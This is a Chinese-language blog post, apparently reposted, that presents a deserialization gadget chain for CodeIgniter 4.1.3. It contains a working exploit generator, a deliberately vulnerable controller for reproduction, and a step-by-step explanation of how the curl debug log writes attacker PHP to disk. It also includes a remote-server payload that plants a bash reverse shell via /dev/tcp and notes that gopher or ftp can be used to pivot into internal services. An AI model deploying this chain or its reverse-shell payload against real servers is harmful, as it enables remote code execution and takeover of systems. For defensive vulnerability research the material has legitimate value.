当前位置：首页 > news >正文

codeigniter 4.1.3 gadget chain

news 2025/11/1 5:47:48

EXP code

找到一条很有意思的codeigniter框架的链。

<?php
namespace CodeIgniter\HTTP {class CURLRequest {protected $config = ["debug" => "./eee.php"];}
}namespace CodeIgniter\Session\Handlers {class MemcachedHandler{public function __construct($memcached, $url){$this->memcached = $memcached;$this->lockKey = $url;}}
}namespace CodeIgniter\Cache\Handlers {class RedisHandler{public $redis;public function __construct($redis){$this -> redis = $redis;}}
}namespace {$ip = $argv[1];$port = $argv[2];$exp = array(new \CodeIgniter\Cache\Handlers\RedisHandler(new \CodeIgniter\Session\Handlers\MemcachedHandler(new \CodeIgniter\HTTP\CURLRequest(),"http://$ip:$port/")));echo urlencode(serialize($exp));
}

复现

下载最新的CodeIgniter框架，将以下代码写入app/controller/Home.php。

<?php
namespace App\Controllers;class Home extends BaseController
{public function index(){$obj = @unserialize($_GET['obj']);var_dump($obj);return view('welcome_message');}
}

准备一个远程服务器，并填入php代码<?php header("X-Powered-By: <?php phpinfo();");到index.php。之后在index.php所在目录启动一个简单的php http服务器。

执行上述exp并复制exp的输出。

php exp.php remote_server_ip remote_server_port

在本地启动CodeIgniter框架，将exp的输出粘贴到obj参数中。然后，此exp将发送请求到远程服务器，并在本地写入eee.php。访问eee.php将执行phpinfo。

漏洞原理

新gadget的起始向量仍然是CodeIgniter\Cache\Handlers\RedisHandler::__destruct方法。

public function __destruct()
{if (isset($this->redis)){$this->redis->close();}
}

将redis设置为CodeIgniter\Session\Handlers\MemcachedHandler'类的对象，然后我们跳到CodeIgniter\Session\Handlers\MemcachedHandler::close方法。

public function close(): bool
{if (isset($this->memcached)){isset($this->lockKey) && $this->memcached->delete($this->lockKey);...

将lockKey分配给一个特别准备的远程服务器ip，memcached分配给一个CodeIgniter\HTTP\CURLRequest类的对象，这个对象，在config中设置debug选项为一个php文件。

之后我们将跳到CodeIgniter\HTTP\CURLRequest::delete方法。

public function delete(string $url, array $options = []): ResponseInterface
{return $this->request('delete', $url, $options);
}

这个方法将http请求发送到设置的远程服务器。并且后续的调用将设置$curlOptions[CURLOPT_STDERR]为我们之前指定的php文件。设置$curlOptions的方法是CodeIgniter\HTTP\CURLRequest::setCURLOptions。

protected function setCURLOptions(array $curlOptions = [], array $config = [])
{
...if ($config['debug']){$curlOptions[CURLOPT_VERBOSE] = 1;$curlOptions[CURLOPT_STDERR]  = is_string($config['debug']) ? fopen($config['debug'], 'a+') : fopen('php://stderr', 'w');}
...
}

设置好的远程服务器将对发出的请求作出响应，并在响应头中返回一段php代码。这段php代码会被写入我们指定的curl日志文件中，也就是那个php文件。

远程服务器上的index.php。

<?php
header("X-Powered-By: <?php system('bash -c \"bash -i >& /dev/tcp/ip/port 0>&1\"');?>");

恶意的curl日志文件。

* Expire in 0 ms for 6 (transfer 0x???)
*   Trying ???...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x???)
* Connected to ??? (???) port ??? (#0)
> DELETE / HTTP/1.1
Host: ???
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1< HTTP/1.1 200 OK
< Host: ???
< Date: Thu, 26 Aug 2021 06:07:19 GMT
< Connection: close
< X-Powered-By: <?php system('bash -c "bash -i >& /dev/tcp/ip/port 0>&1"');?>
< Content-type: text/html; charset=UTF-8
< 
* Closing connection 0

影响

如上所示，这可能导致恶意的php文件被写入服务器，导致攻击者获取服务器权限。
当攻击者无法写入恶意文件时，他可以用gopher或ftp协议代替上述http协议来攻击内网服务。

codeigniter 4.1.3 gadget chain

EXP code

复现

漏洞原理

影响

相关文章：

codeigniter 4.1.3 gadget chain

L1-039 古风排版 C++解法

docker安装tomcat

别人ping不通我的ip解决方法

Python爬虫基础之Selenium详解

MS5228数模转换器可pin对pin兼容AD5628

强化学习基础（2）—常用算法总结

Web攻防01-ASP应用相关漏洞-HTTP.SYSIIS短文件文件解析ACCESS注入

入门小白拥有服务器的建议

Spring源码解析——事务增强器

JAVA发送消息到RabbitMq

Python 函数（lambda 匿名函数、自定义函数、装饰器）基本使用指南

第五届芜湖机器人展，正运动助力智能装备“更快更准”更智能！

JVM八股文

代码随想录算法训练营第二十四天丨回溯算法part02

【Python机器学习】零基础掌握AgglomerativeClustering聚类

uniapp小程序中给web-view页面添加授权弹窗（使用cover-view组件覆盖实现该功能）

2023年全球及中国CGT CDMO市场发展现状分析：CGT 渗透率有效助力CGT CDMO快速发展[图]

上抖音热搜榜需要做哪些准备？

LDA代码训练报错记录

【Axure高保真原型】引导弹窗

java_网络服务相关_gateway_nacos_feign区别联系

【HarmonyOS 5.0】DevEco Testing：鸿蒙应用质量保障的终极武器

从深圳崛起的“机器之眼”：赴港乐动机器人的万亿赛道赶考路

【2025年】解决Burpsuite抓不到https包的问题

论文解读：交大港大上海AI Lab开源论文 | 宇树机器人多姿态起立控制强化学习框架（一）

算法笔记2

C/C++ 中附加包含目录、附加库目录与附加依赖项详解

MFC 抛体运动模拟：常见问题解决与界面美化

第7篇：中间件全链路监控与 SQL 性能分析实践